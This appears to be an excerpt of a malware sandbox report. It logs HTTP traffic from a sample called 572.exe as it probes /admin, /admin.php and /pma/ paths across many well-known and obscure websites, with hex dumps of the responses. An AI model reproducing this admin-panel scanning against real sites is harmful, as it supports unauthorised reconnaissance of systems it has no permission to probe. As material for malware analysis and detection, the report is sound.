                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                567192.168.2.65000164.190.63.13680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.871021986 CET221OUTGET /admin?sub1=20240205-2216-12ca-876d-f5344b7b6169 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.081279993 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                568192.168.2.65013131.13.65.180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.173531055 CET172OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.275161982 CET206INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                569192.168.2.65013677.240.114.21280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.173790932 CET166OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.391402006 CET423INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Location: https://mw.redsa.net/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 233
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 77 2e 72 65 64 73 61 2e 6e 65 74 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/pma/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                570192.168.2.65022154.71.181.16080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.173834085 CET177OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:14.464720964 CET960INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: http://ucivirtual.uci.edu.mx/admin/index.php?cache=1
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                X-Accel-Buffering: no
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: MoodleSession=83d9cfbk68lcntrdj2be5fingm; path=/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:29 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 499
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 63 69 6f 6e 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 65 6d 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 45 73 74 61 20 70 c3 a1 67 69 6e 61 20 64 65 62 65 72 c3 ad 61 20 72 65 64 69 72 65 63 63 69 6f 6e 61 72 20 61 75 74 6f 6d c3 a1 74 69 63 61 6d 65 6e 74 65 2e 20 53 69 20 6e 6f 20 6f 63 75 72 72 65 20 6e 61 64 61 2c 20 70 6f 72 20 66 61 76 6f 72 20 75 74 69 6c 69 63 65 20 65 6c 20 65 6e 6c 61 63 65 20 64 65 20 63 6f 6e 74 69 6e 75 61 72 20 71 75 65 20 61 70 61 72 65 63 65 20 6d c3 a1 73 20 61 62 61 6a 6f 2e 3c 62 72 20 2f 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 61 64 6d 69 6e 2f 69 6e 64 65 78 2e 70 68 70 3f 63 61 63 68 65 3d 31 22 3e 43 6f 6e 74 69 6e 75 61 72 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta pgina debera redireccionar automticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece ms abajo.<br /><a href="http://ucivirtual.uci.edu.mx/admin/index.php?cache=1">Continuar</a></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                571192.168.2.650234142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.194952965 CET178OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.316575050 CET483INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.316586971 CET182INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 62 30 82 31 41 63 a1 7f df 98 f6 d8 b9 2c 3b 3b 0c 6f 49 cd db 86 26 a4 66 79 19 06 bf f3 86 d1 d6 be d4 00 b8 32 ce ae 62 9d e6 37 c1 df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHIkA$b01Ac,;;oI&fy2b7CB/Xtkt}OU=xXQM7Z-6`bYA.)B,3-iV"8(P1'


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                572192.168.2.650237104.21.5.2580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.211653948 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: opsu.terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.338767052 CET701INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://terna.net
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B8VnGjlCnQhS1ps%2FF4apm2Qd3VKCi9pg9bey%2F8ComWOpdEwKGlr%2FVZKPuRv9x6zwVzHCMIjP6nIJYq3yX5PduGAvHxxbsF0YydS0Gad6X7GjJ8Ve5AqTkljyklEYW%2BBTXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6ee8f4b0e2-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                573192.168.2.650238103.224.182.21080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.247138977 CET175OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.429506063 CET343INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131773.8789606; expires=Thu, 02-Feb-2034 11:16:13 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/admin/?sub1=20240205-2216-13fb-b4a4-baa2c3c98c38
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                574192.168.2.650264142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.329305887 CET173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.455708027 CET478INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.455732107 CET178INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 e2 62 0a c6 48 8c 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 b5 68 1b 96 d0 9a e7 65 18 e2 26 1a ce 5a fb 82 01 09 30 8b 75 d2 3d a7 37 25 df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHkA$bH}cc0he&Z0u=7%CB/XtKt}UFEXQx=kn"4+21GsT~YH65'H5d1`%9K;


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                575192.168.2.650351170.114.52.480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.395504951 CET170OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.539329052 CET1012INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://us04web.zoom.us/admin
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=nonX9lA4Bp28X4P7a5xe5bcJPRFbPY0w140CDdtpy40-1707131773-1-AUuSXHcmel1yaisKndlzWUA88gy9kPVbBTLJ2IREa9ePHncIC45K2FJ5amTE7xZliJDd91hT6fQBblWos7Aw7u4=; path=/; expires=Mon, 05-Feb-24 11:46:13 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RAXoQ6SPSGvCmFPLTCkEgmh%2ByQCFCQrf7UKoRHG4xHopEkF3e6Dw679obJum%2FfATGmQN6soglfWjdFpywl95PuC4Mx8R6euc0oGkmRna7KyWEIlPs3oFwaDQz8dulRYhRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd700ef9ad94-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                576192.168.2.6503603.161.136.280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.395751953 CET179OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.497476101 CET579INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 995613db19b5d036af774654ce47e9fa.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: AhfioYrMJyWX2ee3LcyatTyrIFSncD3sI-lhGtNYBmcSIRFXlSknwg==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                577192.168.2.650235124.237.208.3780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.443566084 CET169OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.810928106 CET1280INData Raw: 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Y]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&dOAM$"0^Nzm2vPJW7HEMY2{~z}Am}{EOT @9o-@\ g9@
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.810940027 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821692746961147
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=342CDDB632C0EDB874E5202F1BA7A945:FG=1; expires=Tue, 04-Feb-25 11:16:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821692746961147
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0sMajEFUmr/tG5Nv+UfTwfrrwBFwSCCnP+wTlk3OCccCoaD3A==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
